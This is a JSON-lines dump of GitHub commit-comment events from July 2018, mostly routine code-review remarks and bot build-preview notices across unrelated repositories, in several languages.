{"id":"7997200703","type":"CommitCommentEvent","actor":{"login":"vrsttl"},"repo":{"name":"green-fox-academy/JudgeFudge911"},"payload":{"comment":{"id":29784780,"position":null,"line":null,"path":null,"commit_id":"72c8906db9718eabec7d438d1926a742ebe569c8","created_at":"2018-07-20T21:07:02Z","updated_at":"2018-07-20T21:07:02Z","author_association":"NONE","body":"Én a Reactnek ugrottam neki :)) most kezdődik az izgalmas szakasz!"}},"created_at":"2018-07-20T21:07:02Z"}
{"id":"7997210075","type":"CommitCommentEvent","actor":{"login":"Emjay89"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29784805,"position":null,"line":null,"path":null,"commit_id":"8502693e81b98b8848c8a511def6d1e65bb4f729","created_at":"2018-07-20T21:09:30Z","updated_at":"2018-07-20T21:09:30Z","author_association":"CONTRIBUTOR","body":"Oh merde. J’avais lu “is not flesh” /:"}},"created_at":"2018-07-20T21:09:30Z"}
{"id":"7997211214","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Daniil-Ageev/QC_Project"},"payload":{"comment":{"id":29784807,"position":null,"line":null,"path":null,"commit_id":"673a0fceae9c196283ab61836a55c582fdb0682f","created_at":"2018-07-20T21:09:47Z","updated_at":"2018-07-20T21:09:47Z","author_association":"NONE","body":"Add venv folder to gitignore. There is no useful information in it. The only configuration file you need to include in your repository is the requirements.txt file generated by pip freeze > requirements.txt which lists package dependencies."}},"created_at":"2018-07-20T21:09:47Z"}
{"id":"7997212231","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29784811,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-20T21:10:03Z","updated_at":"2018-07-20T21:10:03Z","author_association":"NONE","body":"Hi @damarlas . See @MarkoTotti's post above yours. :)"}},"created_at":"2018-07-20T21:10:03Z"}
{"id":"7997216991","type":"CommitCommentEvent","actor":{"login":"ixil"},"repo":{"name":"be5invis/Iosevka"},"payload":{"comment":{"id":29784817,"position":null,"line":null,"path":null,"commit_id":"e31de1b155abc28bf71901b4b2bc28cd3732cfba","created_at":"2018-07-20T21:11:15Z","updated_at":"2018-07-20T21:11:15Z","author_association":"NONE","body":"Ahh sorry, the release notes I mentioned a iosevka-pack-*-*-*\n\n\"The bundled iosevka-pack-#.#.# option contains all packages from\n01.iosevka-#.#.# to 08.iosevka-cc-slab-#.#.#.\"\n\nOn Fri, 20 Jul. 2018, 6:34 pm Belleve Invis, <notifications@github.com>\nwrote:\n\n> iosevka-pack has been broken into ttc-iosevka and ttc-iosevka-slab.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/be5invis/Iosevka/commit/e31de1b155abc28bf71901b4b2bc28cd3732cfba#commitcomment-29781773>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB9pWyFW2N-Hfo19KnFS7lquNPuMAdBgks5uIgaWgaJpZM4VYR4R>\n> .\n>\n"}},"created_at":"2018-07-20T21:11:15Z"}
{"id":"7997219455","type":"CommitCommentEvent","actor":{"login":"tuanvpham"},"repo":{"name":"Visteus/Shopping-Manager"},"payload":{"comment":{"id":29784822,"position":null,"line":null,"path":null,"commit_id":"ef55ea42b4cf3588337003f3f656f7d373a4e653","created_at":"2018-07-20T21:11:56Z","updated_at":"2018-07-20T21:11:56Z","author_association":"COLLABORATOR","body":"#8 Update timeframe"}},"created_at":"2018-07-20T21:11:56Z"}
{"id":"7997220761","type":"CommitCommentEvent","actor":{"login":"sundeepsf"},"repo":{"name":"salesforce/Argus"},"payload":{"comment":{"id":29784826,"position":5,"line":130,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/service/alert/notifier/GOCNotifier.java","commit_id":"69bb1d6f784ffc20d37f8713090d0036cbe0ede5","created_at":"2018-07-20T21:12:17Z","updated_at":"2018-07-20T21:12:17Z","author_association":"CONTRIBUTOR","body":"does this change the field name or just the value? Also are you still including everything in the message?"}},"created_at":"2018-07-20T21:12:17Z"}
{"id":"7997224111","type":"CommitCommentEvent","actor":{"login":"kehv1n"},"repo":{"name":"kehv1n/hacker_news"},"payload":{"comment":{"id":29784838,"position":46,"line":51,"path":"data/datasources/hacker_news.py","commit_id":"a30c85bfd2deabde10e17cdcccf206a1006980aa","created_at":"2018-07-20T21:13:11Z","updated_at":"2018-07-20T21:13:11Z","author_association":"OWNER","body":"Use a list comprehension here: \r\nsomething _like:_ \r\n```story = [hackernews_ds.get_story(ids)['title'] for ids in response_json[0:10]]```\r\n"}},"created_at":"2018-07-20T21:13:11Z"}
{"id":"7997235066","type":"CommitCommentEvent","actor":{"login":"karthiknadig"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29784871,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-20T21:16:01Z","updated_at":"2018-07-20T21:16:01Z","author_association":"OWNER","body":"@DonJayamanne There is no distinction between VS  and VSC. This completely relies on the flags that are set. We could add a distinction, if we feel it is necessary to isolate this feature further."}},"created_at":"2018-07-20T21:16:01Z"}
{"id":"7997235455","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Daniil-Ageev/QC_Project"},"payload":{"comment":{"id":29784873,"position":null,"line":null,"path":null,"commit_id":"1e0c39692a25e42108c48deabf3a81855f4df30f","created_at":"2018-07-20T21:16:08Z","updated_at":"2018-07-20T21:16:08Z","author_association":"NONE","body":"If you want to leave comments about your classes and functions, it will be better if you follow the PEP convention.\r\n\r\n[Read about PEP 257 -- Docstring Conventions](https://www.python.org/dev/peps/pep-0257/)."}},"created_at":"2018-07-20T21:16:08Z"}
{"id":"7997236080","type":"CommitCommentEvent","actor":{"login":"kehv1n"},"repo":{"name":"kehv1n/hacker_news"},"payload":{"comment":{"id":29784877,"position":null,"line":null,"path":null,"commit_id":"a30c85bfd2deabde10e17cdcccf206a1006980aa","created_at":"2018-07-20T21:16:18Z","updated_at":"2018-07-20T21:16:18Z","author_association":"OWNER","body":"Also this is a perfect time to practice defensive programming where you check to see IF that key exists first: \r\n\r\n```if (response_json['title]):  story.append()``` \r\n  \r\nThis if statement can be included into the list comprehension "}},"created_at":"2018-07-20T21:16:18Z"}
{"id":"7997248685","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29784911,"position":null,"line":null,"path":null,"commit_id":"0f1f2e3a9daa81a319470e56e52e7c8d62c4df1b","created_at":"2018-07-20T21:19:47Z","updated_at":"2018-07-20T21:19:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor code using HOC and render props wherever possible](https://trello.com/c/DYW8yuSg/20-refactor-code-using-hoc-and-render-props-wherever-possible)"}},"created_at":"2018-07-20T21:19:47Z"}
{"id":"7997249181","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29784912,"position":null,"line":null,"path":null,"commit_id":"6c04b6652ef3b0e61fa0f5151b24bab267dc1517","created_at":"2018-07-20T21:19:55Z","updated_at":"2018-07-20T21:19:55Z","author_association":"CONTRIBUTOR","body":"The projects reset icon also needs same treatment ;) https://github.com/StylishThemes/GitHub-Dark/projects?utf8=%E2%9C%93&query=is%3Aopen+test"}},"created_at":"2018-07-20T21:19:55Z"}
{"id":"7997249789","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29784913,"position":null,"line":null,"path":null,"commit_id":"44f398f59cbce78f32ef515c675ef4f3fa03d8d5","created_at":"2018-07-20T21:20:05Z","updated_at":"2018-07-20T21:20:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor forms](https://trello.com/c/LLFcarQg/21-refactor-forms)"}},"created_at":"2018-07-20T21:20:05Z"}
{"id":"7997249798","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29784914,"position":null,"line":null,"path":null,"commit_id":"31a93d37304b89c78ae53ae83f20197973628775","created_at":"2018-07-20T21:20:05Z","updated_at":"2018-07-20T21:20:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor forms](https://trello.com/c/LLFcarQg/21-refactor-forms)"}},"created_at":"2018-07-20T21:20:05Z"}
{"id":"7997250134","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29784915,"position":null,"line":null,"path":null,"commit_id":"0f1f2e3a9daa81a319470e56e52e7c8d62c4df1b","created_at":"2018-07-20T21:20:11Z","updated_at":"2018-07-20T21:20:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor forms](https://trello.com/c/LLFcarQg/21-refactor-forms)"}},"created_at":"2018-07-20T21:20:11Z"}
{"id":"7997250949","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29784919,"position":null,"line":null,"path":null,"commit_id":"28973f4ef82757997772aef1a881c651c812df3e","created_at":"2018-07-20T21:20:24Z","updated_at":"2018-07-20T21:20:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor forms](https://trello.com/c/LLFcarQg/21-refactor-forms)"}},"created_at":"2018-07-20T21:20:24Z"}
{"id":"7997252273","type":"CommitCommentEvent","actor":{"login":"dhruvhacks"},"repo":{"name":"ishneetknarang/Attendance_Module"},"payload":{"comment":{"id":29784926,"position":10,"line":10,"path":"student/models.py","commit_id":"2e77d343b6a785c0f57c56cdce9dec80f99ca283","created_at":"2018-07-20T21:20:45Z","updated_at":"2018-07-20T21:20:45Z","author_association":"NONE","body":"Storing passwords as strings does not make any sense.\r\nOn the first place, you must apply foreign key to ```django.contrib.auth.models.User``` for login purposes."}},"created_at":"2018-07-20T21:20:45Z"}
{"id":"7997253039","type":"CommitCommentEvent","actor":{"login":"p-schneider"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":29784931,"position":19,"line":192,"path":"net/netplan-lib.pl","commit_id":"9b01780508fd92d4bbdbc588a93be6d0f9d40a19","created_at":"2018-07-20T21:20:59Z","updated_at":"2018-07-20T21:20:59Z","author_association":"NONE","body":"@jcameron the first parameter `\",\"` should not be there\r\n`&join_addr_netmask(\",\", @{…` should be `&join_addr_netmask(@{…`"}},"created_at":"2018-07-20T21:20:59Z"}
{"id":"7997254418","type":"CommitCommentEvent","actor":{"login":"dhruvhacks"},"repo":{"name":"ishneetknarang/Attendance_Module"},"payload":{"comment":{"id":29784933,"position":17,"line":17,"path":"student/models.py","commit_id":"2e77d343b6a785c0f57c56cdce9dec80f99ca283","created_at":"2018-07-20T21:21:21Z","updated_at":"2018-07-20T21:21:21Z","author_association":"NONE","body":"Same foreign key with ```User``` table applies here."}},"created_at":"2018-07-20T21:21:21Z"}
{"id":"7997257330","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29784937,"position":5,"line":208,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:22:09Z","updated_at":"2018-07-20T21:22:09Z","author_association":"COLLABORATOR","body":"Commenting out code works, but is generally not optimal. Since it is in version control, we can just delete it, and if we need it again checkout from that commit. "}},"created_at":"2018-07-20T21:22:09Z"}
{"id":"7997257547","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29784938,"position":14,"line":298,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:22:12Z","updated_at":"2018-07-20T21:22:12Z","author_association":"COLLABORATOR","body":"Switch out `str` for `format`. If you are unsure what substitutions to use, `%s` should work for everything."}},"created_at":"2018-07-20T21:22:12Z"}
{"id":"7997258822","type":"CommitCommentEvent","actor":{"login":"dhruvhacks"},"repo":{"name":"ishneetknarang/Attendance_Module"},"payload":{"comment":{"id":29784944,"position":32,"line":32,"path":"student/models.py","commit_id":"2e77d343b6a785c0f57c56cdce9dec80f99ca283","created_at":"2018-07-20T21:22:33Z","updated_at":"2018-07-20T21:22:33Z","author_association":"NONE","body":"Where is the count of student's absence and presence??"}},"created_at":"2018-07-20T21:22:33Z"}
{"id":"7997260946","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29784953,"position":25,"line":330,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:23:08Z","updated_at":"2018-07-20T21:23:08Z","author_association":"COLLABORATOR","body":"Generally we only use one new line for top level forms, but two is acceptable if it is consistent. You should pick one or the other. "}},"created_at":"2018-07-20T21:23:08Z"}
{"id":"7997261642","type":"CommitCommentEvent","actor":{"login":"mohawkjohn"},"repo":{"name":"Arafatk/magick-rubyplot"},"payload":{"comment":{"id":29784957,"position":31,"line":31,"path":"lib/rubyplot/scripting/stacked_bar/draw.rb","commit_id":"9160f0d73333605338f8b25c42ba0c7d2b307bdb","created_at":"2018-07-20T21:23:19Z","updated_at":"2018-07-20T21:23:19Z","author_association":"NONE","body":"How come this is the only method with a bang in its name? Do these others also change the receiver?"}},"created_at":"2018-07-20T21:23:19Z"}
{"id":"7997264556","type":"CommitCommentEvent","actor":{"login":"Arafatk"},"repo":{"name":"Arafatk/magick-rubyplot"},"payload":{"comment":{"id":29784963,"position":31,"line":31,"path":"lib/rubyplot/scripting/stacked_bar/draw.rb","commit_id":"9160f0d73333605338f8b25c42ba0c7d2b307bdb","created_at":"2018-07-20T21:24:08Z","updated_at":"2018-07-20T21:24:08Z","author_association":"OWNER","body":"Please ignore these for now.   \r\nI will change all of it."}},"created_at":"2018-07-20T21:24:08Z"}
{"id":"7997265135","type":"CommitCommentEvent","actor":{"login":"Arafatk"},"repo":{"name":"Arafatk/magick-rubyplot"},"payload":{"comment":{"id":29784966,"position":31,"line":31,"path":"lib/rubyplot/scripting/stacked_bar/draw.rb","commit_id":"9160f0d73333605338f8b25c42ba0c7d2b307bdb","created_at":"2018-07-20T21:24:17Z","updated_at":"2018-07-20T21:24:17Z","author_association":"OWNER","body":"Sorry for the trouble."}},"created_at":"2018-07-20T21:24:17Z"}
{"id":"7997283834","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29785006,"position":58,"line":396,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:29:29Z","updated_at":"2018-07-20T21:29:29Z","author_association":"COLLABORATOR","body":"Also, when commenting out forms like this, it is preferred to use the reader macro `#_`. Did you know that for pairs of forms you can do `#_#_`?? It is very useful in the type of situation, the reason for using `#_` is it keeps parens balanced. "}},"created_at":"2018-07-20T21:29:29Z"}
{"id":"7997284793","type":"CommitCommentEvent","actor":{"login":"DonJayamanne"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29785008,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-20T21:29:46Z","updated_at":"2018-07-20T21:29:46Z","author_association":"NONE","body":"What flag is it?"}},"created_at":"2018-07-20T21:29:46Z"}
{"id":"7997285179","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29785009,"position":null,"line":null,"path":null,"commit_id":"bb79e36fc8054c3da0ef034c6bffa79eaa56f6d1","created_at":"2018-07-20T21:29:53Z","updated_at":"2018-07-20T21:29:53Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-325](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-325).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-325-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-20T21:29:53Z"}
{"id":"7997285476","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29785010,"position":62,"line":400,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:29:58Z","updated_at":"2018-07-20T21:29:58Z","author_association":"COLLABORATOR","body":"Again, we probably prefer `#_` here, and this comment can probably be deleted. "}},"created_at":"2018-07-20T21:29:58Z"}
{"id":"7997288097","type":"CommitCommentEvent","actor":{"login":"ivansg44"},"repo":{"name":"ivansg44/LexMapr"},"payload":{"comment":{"id":29785017,"position":21,"line":977,"path":"lexmapr/pipeline.py","commit_id":"b24e42a2a8de434753eb480870af5800ba0d7d0e","created_at":"2018-07-20T21:30:39Z","updated_at":"2018-07-20T21:30:39Z","author_association":"OWNER","body":"@lexmapr Can you confirm this was an indentation typo? This if-statement is duplicated 5 times for 1-5 component matching, and it is only indented to the same level of the for-loop in the 2-component matching section.\r\n\r\nChanging this indentation effected one test: test_full_term_sfx_match."}},"created_at":"2018-07-20T21:30:39Z"}
{"id":"7997293859","type":"CommitCommentEvent","actor":{"login":"srasku"},"repo":{"name":"google/googletest"},"payload":{"comment":{"id":29785028,"position":576,"line":405,"path":"googletest/docs/advanced.md","commit_id":"5437926b2213b1c45c2f34bd858734de90e5fffd","created_at":"2018-07-20T21:32:15Z","updated_at":"2018-07-20T21:32:15Z","author_association":"NONE","body":"Is this link supposed to go somewhere?"}},"created_at":"2018-07-20T21:32:15Z"}
{"id":"7997296805","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29785035,"position":24,"line":329,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:33:08Z","updated_at":"2018-07-20T21:33:08Z","author_association":"COLLABORATOR","body":"Please `require` `'[clojure.string :as str]` or something. Also, I have noticed `use` used throughout the project. It would be worth moving to `require`, as `use` is deprecated. "}},"created_at":"2018-07-20T21:33:08Z"}
{"id":"7997306014","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29785058,"position":42,"line":389,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:35:49Z","updated_at":"2018-07-20T21:35:49Z","author_association":"COLLABORATOR","body":"This looks like something that could be solved with `reduce`. I could be wrong, but it would make it much more legible. "}},"created_at":"2018-07-20T21:35:49Z"}
{"id":"7997308659","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29785065,"position":null,"line":null,"path":null,"commit_id":"0d88b1b7ffba08161ab60ba1722859562dab944e","created_at":"2018-07-20T21:36:35Z","updated_at":"2018-07-20T21:36:35Z","author_association":"COLLABORATOR","body":"<h3>remove Checkbox checked state (never read), fix indeterminate</h3>\n\nPreview: <strong><a href='https://18698-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18698-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18698-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-20T21:36:35Z"}
{"id":"7997313544","type":"CommitCommentEvent","actor":{"login":"crdelsey"},"repo":{"name":"crdelsey/gazebo_ros_pkgs"},"payload":{"comment":{"id":29785075,"position":null,"line":null,"path":null,"commit_id":"6ccbdd3b7e0f398bac46d5b6f8867bc062ea187e","created_at":"2018-07-20T21:38:06Z","updated_at":"2018-07-20T21:38:06Z","author_association":"OWNER","body":"Addresses ros2/ros1_bridge#128"}},"created_at":"2018-07-20T21:38:06Z"}
{"id":"7997313998","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29785076,"position":65,"line":403,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:38:14Z","updated_at":"2018-07-20T21:38:14Z","author_association":"COLLABORATOR","body":"What is going on here with that call to `str` ending in `\"\\n\"`? I feel like there's a better way to do this, because there is a large amount of repeated patterns. If you don't feel there is, that's fine too. "}},"created_at":"2018-07-20T21:38:14Z"}
{"id":"7997314946","type":"CommitCommentEvent","actor":{"login":"iwanb"},"repo":{"name":"iwanb/pip"},"payload":{"comment":{"id":29785077,"position":15,"line":133,"path":"src/pip/_internal/req/req_file.py","commit_id":"6ead47f2f155cff335f2b5b36034519957c95b23","created_at":"2018-07-20T21:38:30Z","updated_at":"2018-07-20T21:38:30Z","author_association":"OWNER","body":"Ah indeed I did not get the FormatControl object at first, I will try that, it should be simpler.\r\nThe copy is a bit of a hack."}},"created_at":"2018-07-20T21:38:30Z"}
{"id":"7997316649","type":"CommitCommentEvent","actor":{"login":"sean-stockholm"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29785083,"position":75,"line":416,"path":"src/utilities/spec_generator.clj","commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-20T21:39:01Z","updated_at":"2018-07-20T21:39:01Z","author_association":"COLLABORATOR","body":"Like earlier, reader macro `#_` is better for this, and what would be best is probably just deleting it. "}},"created_at":"2018-07-20T21:39:01Z"}
{"id":"7997323828","type":"CommitCommentEvent","actor":{"login":"kehv1n"},"repo":{"name":"kehv1n/hacker_news"},"payload":{"comment":{"id":29785104,"position":7,"line":24,"path":"data/base.py","commit_id":"e8071e1d3f8a7e242173b788eae22fe1cd17ce26","created_at":"2018-07-20T21:41:03Z","updated_at":"2018-07-20T21:41:03Z","author_association":"OWNER","body":"I would advise you to create a dataframe from the data object you get back from the api (https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.append.html) \r\n\r\nOnce the dataframe is created, you should use pandas' df.to_csv() to create a csv: (https://pandas.pydata.org/pandas-docs/version/0.21/generated/pandas.DataFrame.to_csv.html)\r\n\r\nAnytime you're wrangling data it is _almost always_ a good idea to use a pandas \r\n\r\nWith the dataframe, you can change the headers, turn it into a dict/array/tuple/csv for processing, etc \r\n"}},"created_at":"2018-07-20T21:41:03Z"}
{"id":"7997325539","type":"CommitCommentEvent","actor":{"login":"languagelawyer"},"repo":{"name":"zygoloid/wg21papers"},"payload":{"comment":{"id":29785110,"position":59,"line":442,"path":"done/p0593r2.bs","commit_id":"f0693326ab93773e06b39432c19331ec874d32a1","created_at":"2018-07-20T21:41:33Z","updated_at":"2018-07-20T21:41:33Z","author_association":"NONE","body":"\"dynamic type\" currently is defined as a property of an expression, not a storage\r\nhttp://eel.is/c++draft/intro.defs#defns.dynamic.type\r\nhttp://eel.is/c++draft/intro.defs#defns.dynamic.type.prvalue"}},"created_at":"2018-07-20T21:41:33Z"}
{"id":"7997326719","type":"CommitCommentEvent","actor":{"login":"kehv1n"},"repo":{"name":"kehv1n/hacker_news"},"payload":{"comment":{"id":29785111,"position":11,"line":28,"path":"data/base.py","commit_id":"e8071e1d3f8a7e242173b788eae22fe1cd17ce26","created_at":"2018-07-20T21:41:53Z","updated_at":"2018-07-20T21:41:53Z","author_association":"OWNER","body":"Same thing here I believe.. \r\n\r\nYou can save all this time and code energy and work with the df "}},"created_at":"2018-07-20T21:41:53Z"}
{"id":"7997327495","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29785116,"position":null,"line":null,"path":null,"commit_id":"9000852f626f71bc5554deafa3da0f4b1212a313","created_at":"2018-07-20T21:42:07Z","updated_at":"2018-07-20T21:42:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-883](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-883).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-883-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T21:42:07Z"}
{"id":"7997329936","type":"CommitCommentEvent","actor":{"login":"tuanvpham"},"repo":{"name":"Visteus/Shopping-Manager"},"payload":{"comment":{"id":29785119,"position":null,"line":null,"path":null,"commit_id":"d3805611a5cb8139dd41744c12f454d7d248e34e","created_at":"2018-07-20T21:42:48Z","updated_at":"2018-07-20T21:42:48Z","author_association":"COLLABORATOR","body":"#7 Update pagination"}},"created_at":"2018-07-20T21:42:48Z"}
{"id":"7997330505","type":"CommitCommentEvent","actor":{"login":"Pridjes"},"repo":{"name":"ToxycOS/android_frameworks_base"},"payload":{"comment":{"id":29785120,"position":22,"line":0,"path":"core/res/res/values-pt-rBR/toxyc_strings.xml","commit_id":"069315ce1dea318e7c9fa2494ab65596bacdfe04","created_at":"2018-07-20T21:42:58Z","updated_at":"2018-07-20T21:42:58Z","author_association":"NONE","body":"Séria \"Reiniciar\" ou eu estou errado!!!"}},"created_at":"2018-07-20T21:42:58Z"}
{"id":"7997332172","type":"CommitCommentEvent","actor":{"login":"QuantumStatement"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29785124,"position":35,"line":47,"path":"src/main/java/com/mrcrayfish/furniture/blocks/BlockDesk.java","commit_id":"378f8d83028549c6bed8ef83a6629fabe9e64a38","created_at":"2018-07-20T21:43:28Z","updated_at":"2018-07-20T21:43:28Z","author_association":"CONTRIBUTOR","body":"@MrCrayfish I think this tooltip should be translateable (like you did it for Light Switch)\r\nhttps://github.com/MrCrayfish/MrCrayfishFurnitureMod/blob/ab6c736222a84a9d1d5277af04d5400c441c01f4/src/main/java/com/mrcrayfish/furniture/items/ItemLightSwitch.java#L53"}},"created_at":"2018-07-20T21:43:28Z"}
{"id":"7997337315","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29785133,"position":null,"line":null,"path":null,"commit_id":"c02b98a3c2d9e2f6142ec20dae63b84bb1fc8c3f","created_at":"2018-07-20T21:45:01Z","updated_at":"2018-07-20T21:45:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-97](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-97).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-97-next50.pantheonsite.io/)"}},"created_at":"2018-07-20T21:45:01Z"}
{"id":"7997341139","type":"CommitCommentEvent","actor":{"login":"christopherallenDDF"},"repo":{"name":"christopherallenDDF/test"},"payload":{"comment":{"id":29785141,"position":null,"line":null,"path":null,"commit_id":"d5973d82c6dc8d860c2a6e452bb50d951331ac61","created_at":"2018-07-20T21:46:11Z","updated_at":"2018-07-20T21:46:11Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-20T21:46:11Z"}
{"id":"7997344085","type":"CommitCommentEvent","actor":{"login":"daniel-avalos"},"repo":{"name":"daniel-avalos/TTT"},"payload":{"comment":{"id":29785153,"position":83,"line":83,"path":"TTT_v0.5.py","commit_id":"c672723a8fa829461aa29f5baa40c62c67d29b6a","created_at":"2018-07-20T21:47:06Z","updated_at":"2018-07-20T21:47:06Z","author_association":"OWNER","body":"Since winning moves block loops through both players, levi() uses return to break for loop\"\"\r\nConsider separate AiLevi function to unify style"}},"created_at":"2018-07-20T21:47:06Z"}
{"id":"7997349399","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29785164,"position":null,"line":null,"path":null,"commit_id":"7b67289c3a9749fbf2e183951e684bf23cc4e00a","created_at":"2018-07-20T21:48:40Z","updated_at":"2018-07-20T21:48:40Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/7b67289c3a9749fbf2e183951e684bf23cc4e00a/index.html"}},"created_at":"2018-07-20T21:48:40Z"}
{"id":"7997352026","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29785173,"position":null,"line":null,"path":null,"commit_id":"98738399b2fc14aee7e07bbb9c50839ef570a4ba","created_at":"2018-07-20T21:49:29Z","updated_at":"2018-07-20T21:49:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-884](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-884).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-884-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T21:49:29Z"}
